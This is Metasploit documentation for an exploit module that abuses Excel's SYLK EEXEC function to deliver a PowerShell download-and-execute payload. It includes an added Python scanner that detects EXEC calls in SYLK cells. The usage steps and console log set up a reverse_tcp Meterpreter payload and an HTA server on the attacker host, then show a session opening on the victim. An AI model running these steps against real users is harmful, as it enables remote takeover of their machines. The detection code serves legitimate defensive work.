metasploit-gs/documentation/modules/exploit/windows/fileformat/office_excel_slk.md

Introduction

The .slk file format used by Microsoft Excel can execute local commands via the EEXEC(cmd) function. This module takes advantage of this 'feature' to run a download-and-execute PowerShell command in order to spawn a session on the target.
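
Because the command sits in plain text inside the file, a mail or file gateway can flag such documents before they reach Excel. The scanner below is an added example, not part of the Metasploit module or its documentation; it assumes a SYLK file starts with an ID record and that a field beginning with E in a C (cell) record carries the cell expression, and the function names and sample bytes are constructed for illustration.

```python
import re

# Assumption: in a SYLK "C" record a field starting with "E" holds the cell's
# expression, so the page's EEXEC(cmd) is an E field containing EXEC(cmd).
EXEC_CALL = re.compile(r"\bEXEC\s*\(", re.IGNORECASE)


def split_fields(record):
    """Split one SYLK record on ';', treating ';;' as an escaped literal ';'."""
    parts = re.split(r"(?<!;);(?!;)", record)
    return [p.replace(";;", ";") for p in parts]


def find_exec_cells(data):
    """Return (line_no, expression) for each cell whose expression calls EXEC."""
    lines = data.decode("latin-1").splitlines()
    # Assumption: a file without a leading ID record is not treated as SYLK.
    if not lines or not lines[0].startswith("ID;"):
        return []
    hits = []
    for line_no, line in enumerate(lines, start=1):
        fields = split_fields(line)
        if fields[0] != "C":
            continue
        for field in fields[1:]:
            # Only E (expression) fields are evaluated; K fields are plain values.
            if field.startswith("E") and EXEC_CALL.search(field[1:]):
                hits.append((line_no, field[1:]))
    return hits


# Constructed samples; the command is a placeholder, not a real payload.
SUSPICIOUS = b'ID;P\r\nC;X1;Y1;K0;EEXEC("PLACEHOLDER_COMMAND")\r\nE\r\n'
# A cell whose *value* merely mentions EXEC, plus an ordinary formula.
BENIGN = b'ID;P\r\nC;X1;Y1;K"EXEC(summary)"\r\nC;X1;Y2;K3;ER1C1+2\r\nE\r\n'

if __name__ == "__main__":
    for name, blob in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, find_exec_cells(blob))
```

A hit means the file should be quarantined or opened only in an isolated environment; the check looks at expression fields only, so text cells that merely contain the string do not trigger it.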

Vulnerable Application

Microsoft Excel (tested on Excel 2016)

Verification Steps

  1. Start msfconsole
  2. use exploit/windows/fileformat/office_excel_slk
  3. set LHOST [IP]
  4. set SRVHOST [IP]
  5. run
  6. Open the generated file and press 'Enable Content' in Excel

Options

FILENAME

The name of the generated .slk file. Default is a randomly generated file name.

Scenarios

Microsoft Excel 2016 on Windows 10 Build 17763.288

msf > use exploit/windows/fileformat/office_excel_slk
msf exploit(office_excel_slk) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(office_excel_slk) > set lhost 192.168.146.1
lhost => 192.168.146.1
msf exploit(office_excel_slk) > set srvhost 192.168.146.1
srvhost => 192.168.146.1
msf exploit(office_excel_slk) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.146.1:4444
[+] msf.doc stored at /Users/carter/.msf4/local/msf.slk
[*] Using URL: http://192.168.146.1:8080/default.hta
[*] Server started.

Once the victim opens the file and clicks 'Enable Content', a session should spawn:

[*] Sending stage (957487 bytes) to 192.168.146.145
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.145:50165) at 2019-01-13 16:00:49 -0500